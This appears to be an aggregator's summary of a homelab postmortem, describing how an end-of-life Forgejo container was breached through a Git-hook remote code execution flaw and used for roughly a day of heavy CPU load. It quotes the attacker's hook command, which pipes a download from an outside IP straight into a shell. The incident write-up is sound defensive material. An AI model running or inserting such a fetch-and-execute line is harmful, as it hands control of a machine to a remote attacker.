Other Hacker News (GPT)

My Homelab Got Hacked – A Postmortem

CVE-2026-60004ForgejoGiteahomelab security

Waking up to Pushover notifications from Komodo, the author spotted their server's CPU spiking to 95% and then dropping to 80%, while the i5-10600K normally idles at ~4%. Komodo showed sustained 50% CPU usage for about 24 hours, and the Forgejo Docker container was the obvious culprit. Logging in as admin, they found a new user, testpoc26188, with a single repository containing a README and a folder called 'hooks' containing a shell script named post-index-change.

Shutting down the container, they identified CVE-2026-60004, a recently disclosed RCE in Gitea and Forgejo's diffpatch endpoint that enables execution of a malicious Git hook. Although the CVE was patched in v15 LTS and v16, the author was running v13, which reached EOL in January 2026. The root cause: Forgejo only offers versioned image tags (no 'latest'), so Komodo could only show update-available warnings that required manual action, not automatic upgrades.

Diffing Gitea's published POC against the actual exploit revealed the attacker's post-index-change script began with `curl -s http://172.245.159.216 | sh &`, while the POC generated a proof commit via `git hash-object`, `mktree`, `commit-tree`, and `update-ref`. This confirmed the attack vector and the author's plan to investigate further. The incident underscores the tradeoff between stable versioned image tags and the convenience of automatic update notifications, and the need to track EOL versions.

Read original →

← Back to home